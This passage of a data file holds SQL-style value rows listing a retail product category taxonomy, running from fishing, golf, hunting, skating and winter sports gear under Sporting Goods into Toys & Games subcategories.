(4846, 4846, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Nets'),
(4847, 4847, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Reel Accessories'),
(4848, 4848, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Reel Accessories > Fishing Reel Bags & Cases'),
(4849, 4849, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Reel Accessories > Fishing Reel Lubricants'),
(4850, 4850, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Reel Accessories > Fishing Reel Replacement Spools'),
(4851, 4851, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Reels'),
(4852, 4852, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Rod Accessories'),
(4853, 4853, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Rod Accessories > Fishing Rod Bags & Cases'),
(4854, 4854, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Rod Accessories > Fishing Rod Holders & Storage Racks'),
(4855, 4855, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Rods'),
(4856, 4856, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Spears'),
(4857, 4857, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle'),
(4858, 4858, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle > Fishing Baits & Lures'),
(4859, 4859, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle > Fishing Floats'),
(4860, 4860, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle > Fishing Hooks'),
(4861, 4861, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle > Fishing Sinkers'),
(4862, 4862, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Tackle > Fishing Snaps & Swivels'),
(4863, 4863, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Traps'),
(4864, 4864, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fly Tying Materials'),
(4865, 4865, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fly Tying Materials > Fishing Beads'),
(4866, 4866, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fly Tying Materials > Fishing Yarn'),
(4867, 4867, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Live Bait'),
(4868, 4868, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Tackle Bags & Boxes'),
(4869, 4869, 0, 'Sporting Goods > Outdoor Recreation > Golf'),
(4870, 4870, 0, 'Sporting Goods > Outdoor Recreation > Golf > Divot Tools'),
(4871, 4871, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Accessory Sets'),
(4872, 4872, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Bag Accessories'),
(4873, 4873, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Bag Accessories > Golf Bag Carts'),
(4874, 4874, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Bag Accessories > Golf Bag Covers & Cases'),
(4875, 4875, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Bags'),
(4876, 4876, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Ball Markers'),
(4877, 4877, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Balls'),
(4878, 4878, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Club Parts & Accessories'),
(4879, 4879, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Club Parts & Accessories > Golf Club Grips'),
(4880, 4880, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Club Parts & Accessories > Golf Club Headcovers'),
(4881, 4881, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Club Parts & Accessories > Golf Club Shafts'),
(4882, 4882, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Clubs'),
(4883, 4883, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Flags'),
(4884, 4884, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Gloves'),
(4885, 4885, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Tees'),
(4886, 4886, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Towels'),
(4887, 4887, 0, 'Sporting Goods > Outdoor Recreation > Golf > Golf Training Aids'),
(4888, 4888, 0, 'Sporting Goods > Outdoor Recreation > Hang Gliding & Skydiving'),
(4889, 4889, 0, 'Sporting Goods > Outdoor Recreation > Hang Gliding & Skydiving > Air Suits'),
(4890, 4890, 0, 'Sporting Goods > Outdoor Recreation > Hang Gliding & Skydiving > Hang Gliders'),
(4891, 4891, 0, 'Sporting Goods > Outdoor Recreation > Hang Gliding & Skydiving > Parachutes'),
(4892, 4892, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting'),
(4893, 4893, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery'),
(4894, 4894, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Archery Armguards'),
(4895, 4895, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Archery Gloves & Releases'),
(4896, 4896, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Archery Targets'),
(4897, 4897, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Arrow Parts & Accessories'),
(4898, 4898, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Arrow Parts & Accessories > Arrow Fletchings'),
(4899, 4899, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Arrow Parts & Accessories > Arrow Nocks'),
(4900, 4900, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Arrow Parts & Accessories > Broadheads & Field Points'),
(4901, 4901, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Arrows & Bolts'),
(4902, 4902, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Bow & Crossbow Accessories'),
(4903, 4903, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Bows & Crossbows'),
(4904, 4904, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Bows & Crossbows > Compound Bows'),
(4905, 4905, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Bows & Crossbows > Crossbows'),
(4906, 4906, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Bows & Crossbows > Recurve & Longbows'),
(4907, 4907, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Archery > Quivers'),
(4908, 4908, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Clay Pigeon Shooting'),
(4909, 4909, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Clay Pigeon Shooting > Clay Pigeon Throwers'),
(4910, 4910, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Clay Pigeon Shooting > Clay Pigeons'),
(4911, 4911, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting'),
(4912, 4912, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting & Shooting Protective Gear'),
(4913, 4913, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting & Shooting Protective Gear > Hunting & Shooting Gloves'),
(4914, 4914, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting & Shooting Protective Gear > Hunting & Shooting Jackets'),
(4915, 4915, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Animal Traps'),
(4916, 4916, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Hearing Enhancers'),
(4917, 4917, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Hunting Blinds & Screens'),
(4918, 4918, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Hunting Dog Equipment'),
(4919, 4919, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Tree Stands'),
(4920, 4920, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wild Game Feeders'),
(4921, 4921, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wildlife Attractants'),
(4922, 4922, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wildlife Attractants > Cover Scents & Scent Attractants'),
(4923, 4923, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wildlife Attractants > Hunting & Wildlife Calls'),
(4924, 4924, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wildlife Attractants > Hunting & Wildlife Decoys'),
(4925, 4925, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Hunting > Wildlife Attractants > Wildlife Bait, Feed & Minerals'),
(4926, 4926, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft'),
(4927, 4927, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Airsoft'),
(4928, 4928, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Airsoft > Airsoft Gun Parts & Accessories'),
(4929, 4929, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Airsoft > Airsoft Gun Parts & Accessories > Airsoft Gun Batteries'),
(4930, 4930, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Airsoft > Airsoft Guns'),
(4931, 4931, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Airsoft > Airsoft Pellets'),
(4932, 4932, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball'),
(4933, 4933, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball & Airsoft Protective Gear'),
(4934, 4934, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball & Airsoft Protective Gear > Paintball & Airsoft Gloves'),
(4935, 4935, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball & Airsoft Protective Gear > Paintball & Airsoft Goggles & Masks'),
(4936, 4936, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball & Airsoft Protective Gear > Paintball & Airsoft Pads'),
(4937, 4937, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball & Airsoft Protective Gear > Paintball & Airsoft Vests'),
(4938, 4938, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Grenade Launchers'),
(4939, 4939, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Grenades'),
(4940, 4940, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Gun Parts & Accessories'),
(4941, 4941, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Gun Parts & Accessories > Paintball Air Tanks'),
(4942, 4942, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Gun Parts & Accessories > Paintball Gun Barrels'),
(4943, 4943, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Gun Parts & Accessories > Paintball Gun Drop Forwards'),
(4944, 4944, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Gun Parts & Accessories > Paintball Hoppers'),
(4945, 4945, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Guns'),
(4946, 4946, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintball Harnesses & Packs'),
(4947, 4947, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Paintball & Airsoft > Paintball > Paintballs'),
(4948, 4948, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Shooting & Range Accessories'),
(4949, 4949, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Shooting & Range Accessories > Shooting Rests'),
(4950, 4950, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Shooting & Range Accessories > Shooting Sticks & Bipods'),
(4951, 4951, 0, 'Sporting Goods > Outdoor Recreation > Hunting & Shooting > Shooting & Range Accessories > Shooting Targets'),
(4952, 4952, 0, 'Sporting Goods > Outdoor Recreation > Hydration System Accessories'),
(4953, 4953, 0, 'Sporting Goods > Outdoor Recreation > Hydration Systems'),
(4954, 4954, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating'),
(4955, 4955, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Inline & Roller Skating Protective Gear'),
(4956, 4956, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Inline & Roller Skating Protective Gear > Roller Skating Pads'),
(4957, 4957, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Inline Skate Parts'),
(4958, 4958, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Inline Skates'),
(4959, 4959, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Roller Skate Parts'),
(4960, 4960, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Roller Skates'),
(4961, 4961, 0, 'Sporting Goods > Outdoor Recreation > Inline & Roller Skating > Roller Skis'),
(4962, 4962, 0, 'Sporting Goods > Outdoor Recreation > Kite Buggying'),
(4963, 4963, 0, 'Sporting Goods > Outdoor Recreation > Kite Buggying > Kite Buggies'),
(4964, 4964, 0, 'Sporting Goods > Outdoor Recreation > Kite Buggying > Kite Buggy Accessories'),
(4965, 4965, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games'),
(4966, 4966, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Badminton'),
(4967, 4967, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Badminton > Badminton Nets'),
(4968, 4968, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Badminton > Badminton Racquets & Sets'),
(4969, 4969, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Badminton > Shuttlecocks'),
(4970, 4970, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Deck Shuffleboard'),
(4971, 4971, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Deck Shuffleboard > Deck Shuffleboard Cues'),
(4972, 4972, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Deck Shuffleboard > Deck Shuffleboard Pucks'),
(4973, 4973, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Disc Golf'),
(4974, 4974, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Disc Golf > Disc Golf Bags'),
(4975, 4975, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Disc Golf > Disc Golf Baskets'),
(4976, 4976, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Lawn Games'),
(4977, 4977, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Paddle Ball Sets'),
(4978, 4978, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Pickleball'),
(4979, 4979, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Pickleball > Pickleball Paddles'),
(4980, 4980, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Pickleball > Pickleballs'),
(4981, 4981, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Platform & Paddle Tennis'),
(4982, 4982, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Platform & Paddle Tennis > Platform & Paddle Tennis Paddles'),
(4983, 4983, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Platform & Paddle Tennis > Platform Tennis Balls'),
(4984, 4984, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Tetherball'),
(4985, 4985, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Tetherball > Tetherball Poles'),
(4986, 4986, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Tetherball > Tetherball Sets'),
(4987, 4987, 0, 'Sporting Goods > Outdoor Recreation > Outdoor Games > Tetherball > Tetherballs'),
(4988, 4988, 0, 'Sporting Goods > Outdoor Recreation > Riding Scooters'),
(4989, 4989, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding'),
(4990, 4990, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skate Rails'),
(4991, 4991, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skate Ramps'),
(4992, 4992, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboard Parts'),
(4993, 4993, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboard Parts > Skateboard Decks'),
(4994, 4994, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboard Parts > Skateboard Small Parts'),
(4995, 4995, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboard Parts > Skateboard Trucks'),
(4996, 4996, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboard Parts > Skateboard Wheels'),
(4997, 4997, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboarding Protective Gear'),
(4998, 4998, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboarding Protective Gear > Skate Helmets'),
(4999, 4999, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboarding Protective Gear > Skateboarding Gloves'),
(5000, 5000, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboarding Protective Gear > Skateboarding Pads'),
(5001, 5001, 0, 'Sporting Goods > Outdoor Recreation > Skateboarding > Skateboards'),
(5002, 5002, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities'),
(5003, 5003, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Avalanche Safety'),
(5004, 5004, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Avalanche Safety > Avalanche Probes'),
(5005, 5005, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Avalanche Safety > Avalanche Safety Airbags'),
(5006, 5006, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding'),
(5007, 5007, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Bags'),
(5008, 5008, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Goggle Accessories'),
(5009, 5009, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Goggle Accessories > Ski & Snowboard Goggle Lenses'),
(5010, 5010, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Goggles'),
(5011, 5011, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Helmets'),
(5012, 5012, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Leashes'),
(5013, 5013, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Storage Racks'),
(5014, 5014, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Tuning Tools'),
(5015, 5015, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski & Snowboard Wax'),
(5016, 5016, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski Binding Parts'),
(5017, 5017, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski Bindings'),
(5018, 5018, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski Boots'),
(5019, 5019, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Ski Poles'),
(5020, 5020, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Skis'),
(5021, 5021, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Skis > Cross-Country Skis'),
(5022, 5022, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Skis > Downhill Skis'),
(5023, 5023, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Snowboard Binding Parts'),
(5024, 5024, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Snowboard Bindings'),
(5025, 5025, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Snowboard Boots'),
(5026, 5026, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Skiing & Snowboarding > Snowboards'),
(5027, 5027, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Sleds'),
(5028, 5028, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Snowshoeing'),
(5029, 5029, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Snowshoeing > Snowshoe Bindings'),
(5030, 5030, 0, 'Sporting Goods > Outdoor Recreation > Winter Sports & Activities > Snowshoeing > Snowshoes'),
(5031, 5031, 0, 'Toys & Games'),
(5032, 5032, 0, 'Toys & Games > Game Timers'),
(5033, 5033, 0, 'Toys & Games > Games'),
(5034, 5034, 0, 'Toys & Games > Games > Battle Top Accessories'),
(5035, 5035, 0, 'Toys & Games > Games > Battle Tops'),
(5036, 5036, 0, 'Toys & Games > Games > Bingo Sets'),
(5037, 5037, 0, 'Toys & Games > Games > Blackjack & Craps Sets'),
(5038, 5038, 0, 'Toys & Games > Games > Board Games'),
(5039, 5039, 0, 'Toys & Games > Games > Card Game Accessories'),
(5040, 5040, 0, 'Toys & Games > Games > Card Games'),
(5041, 5041, 0, 'Toys & Games > Games > Dexterity Games'),
(5042, 5042, 0, 'Toys & Games > Games > Dice Sets & Games'),
(5043, 5043, 0, 'Toys & Games > Games > Poker Chip Accessories'),
(5044, 5044, 0, 'Toys & Games > Games > Poker Chip Accessories > Poker Chip Carriers & Trays'),
(5045, 5045, 0, 'Toys & Games > Games > Poker Chips & Sets'),
(5046, 5046, 0, 'Toys & Games > Games > Portable Electronic Games'),
(5047, 5047, 0, 'Toys & Games > Games > Roulette Wheels & Sets'),
(5048, 5048, 0, 'Toys & Games > Games > Slot Machines'),
(5049, 5049, 0, 'Toys & Games > Games > Tile Games'),
(5050, 5050, 0, 'Toys & Games > Outdoor Play Equipment'),
(5051, 5051, 0, 'Toys & Games > Outdoor Play Equipment > Inflatable Bouncer Accessories'),
(5052, 5052, 0, 'Toys & Games > Outdoor Play Equipment > Inflatable Bouncers'),
(5053, 5053, 0, 'Toys & Games > Outdoor Play Equipment > Play Swings'),
(5054, 5054, 0, 'Toys & Games > Outdoor Play Equipment > Play Tents & Tunnels'),
(5055, 5055, 0, 'Toys & Games > Outdoor Play Equipment > Playhouses'),
(5056, 5056, 0, 'Toys & Games > Outdoor Play Equipment > Pogo Sticks'),
(5057, 5057, 0, 'Toys & Games > Outdoor Play Equipment > Sandboxes'),
(5058, 5058, 0, 'Toys & Games > Outdoor Play Equipment > See Saws'),
(5059, 5059, 0, 'Toys & Games > Outdoor Play Equipment > Slides'),
(5060, 5060, 0, 'Toys & Games > Outdoor Play Equipment > Stilts'),
(5061, 5061, 0, 'Toys & Games > Outdoor Play Equipment > Swing Set & Playset Accessories'),
(5062, 5062, 0, 'Toys & Games > Outdoor Play Equipment > Swing Sets & Playsets'),
(5063, 5063, 0, 'Toys & Games > Outdoor Play Equipment > Trampoline Accessories'),
(5064, 5064, 0, 'Toys & Games > Outdoor Play Equipment > Trampolines'),
(5065, 5065, 0, 'Toys & Games > Outdoor Play Equipment > Water Play Equipment'),
(5066, 5066, 0, 'Toys & Games > Outdoor Play Equipment > Water Play Equipment > Play Sprinkers'),
(5067, 5067, 0, 'Toys & Games > Outdoor Play Equipment > Water Play Equipment > Water Parks & Slides'),
(5068, 5068, 0, 'Toys & Games > Outdoor Play Equipment > Water Play Equipment > Water Tables'),
(5069, 5069, 0, 'Toys & Games > Puzzles'),
(5070, 5070, 0, 'Toys & Games > Puzzles > Jigsaw Puzzle Accessories'),
(5071, 5071, 0, 'Toys & Games > Puzzles > Jigsaw Puzzles'),
(5072, 5072, 0, 'Toys & Games > Puzzles > Mechanical Puzzles'),
(5073, 5073, 0, 'Toys & Games > Puzzles > Wooden & Pegged Puzzles'),
(5074, 5074, 0, 'Toys & Games > Toys'),
(5075, 5075, 0, 'Toys & Games > Toys > Activity Toys'),
(5076, 5076, 0, 'Toys & Games > Toys > Activity Toys > Ball & Cup Games'),
(5077, 5077, 0, 'Toys & Games > Toys > Activity Toys > Bouncy Balls'),
(5078, 5078, 0, 'Toys & Games > Toys > Activity Toys > Bubble Blowing Solution'),
(5079, 5079, 0, 'Toys & Games > Toys > Activity Toys > Bubble Blowing Toys'),
(5080, 5080, 0, 'Toys & Games > Toys > Activity Toys > Coiled Spring Toys'),
(5081, 5081, 0, 'Toys & Games > Toys > Activity Toys > Marbles'),
(5082, 5082, 0, 'Toys & Games > Toys > Activity Toys > Paddle Ball Toys'),
(5083, 5083, 0, 'Toys & Games > Toys > Activity Toys > Ribbon & Streamer Toys'),
(5084, 5084, 0, 'Toys & Games > Toys > Activity Toys > Spinning Tops'),
(5085, 5085, 0, 'Toys & Games > Toys > Activity Toys > Toy Jacks'),
(5086, 5086, 0, 'Toys & Games > Toys > Activity Toys > Yo-Yo Parts & Accessories'),
(5087, 5087, 0, 'Toys & Games > Toys > Activity Toys > Yo-Yos'),
(5088, 5088, 0, 'Toys & Games > Toys > Art & Drawing Toys'),
(5089, 5089, 0, 'Toys & Games > Toys > Art & Drawing Toys > Play Dough & Putty'),
(5090, 5090, 0, 'Toys & Games > Toys > Art & Drawing Toys > Toy Drawing Tablets'),
(5091, 5091, 0, 'Toys & Games > Toys > Ball Pit Accessories'),
(5092, 5092, 0, 'Toys & Games > Toys > Ball Pit Accessories > Ball Pit Balls'),
(5093, 5093, 0, 'Toys & Games > Toys > Ball Pits'),
(5094, 5094, 0, 'Toys & Games > Toys > Bath Toys'),
(5095, 5095, 0, 'Toys & Games > Toys > Beach & Sand Toys'),
(5096, 5096, 0, 'Toys & Games > Toys > Building Toys'),
(5097, 5097, 0, 'Toys & Games > Toys > Building Toys > Construction Set Toys'),
(5098, 5098, 0, 'Toys & Games > Toys > Building Toys > Foam Blocks'),
(5099, 5099, 0, 'Toys & Games > Toys > Building Toys > Interlocking Blocks'),
(5100, 5100, 0, 'Toys & Games > Toys > Building Toys > Marble Track Sets'),
(5101, 5101, 0, 'Toys & Games > Toys > Building Toys > Wooden Blocks'),
(5102, 5102, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures'),
(5103, 5103, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Action & Toy Figures'),
(5104, 5104, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Bobblehead Figures'),
(5105, 5105, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Doll & Action Figure Accessories'),
(5106, 5106, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Dollhouse Accessories'),
(5107, 5107, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Dollhouses'),
(5108, 5108, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Dolls'),
(5109, 5109, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Paper & Magnetic Dolls'),
(5110, 5110, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Puppet & Puppet Theater Accessories'),
(5111, 5111, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Puppet Theaters'),
(5112, 5112, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Puppets & Marionettes'),
(5113, 5113, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Stuffed Animals'),
(5114, 5114, 0, 'Toys & Games > Toys > Dolls, Playsets & Toy Figures > Toy Playsets'),
(5115, 5115, 0, 'Toys & Games > Toys > Educational Toys'),
(5116, 5116, 0, 'Toys & Games > Toys > Educational Toys > Ant Farms'),
(5117, 5117, 0, 'Toys & Games > Toys > Educational Toys > Astronomy Toys & Models'),
(5118, 5118, 0, 'Toys & Games > Toys > Educational Toys > Bug Collecting Kits'),
(5119, 5119, 0, 'Toys & Games > Toys > Educational Toys > Educational Flash Cards'),
(5120, 5120, 0, 'Toys & Games > Toys > Educational Toys > Reading Toys'),
(5121, 5121, 0, 'Toys & Games > Toys > Educational Toys > Science & Exploration Sets'),
(5122, 5122, 0, 'Toys & Games > Toys > Educational Toys > Toy Abacuses'),
(5123, 5123, 0, 'Toys & Games > Toys > Executive Toys'),
(5124, 5124, 0, 'Toys & Games > Toys > Executive Toys > Magnet Toys'),
(5125, 5125, 0, 'Toys & Games > Toys > Flying Toy Accessories'),
(5126, 5126, 0, 'Toys & Games > Toys > Flying Toy Accessories > Kite Accessories'),
(5127, 5127, 0, 'Toys & Games > Toys > Flying Toy Accessories > Kite Accessories > Kite Line Reels & Winders'),
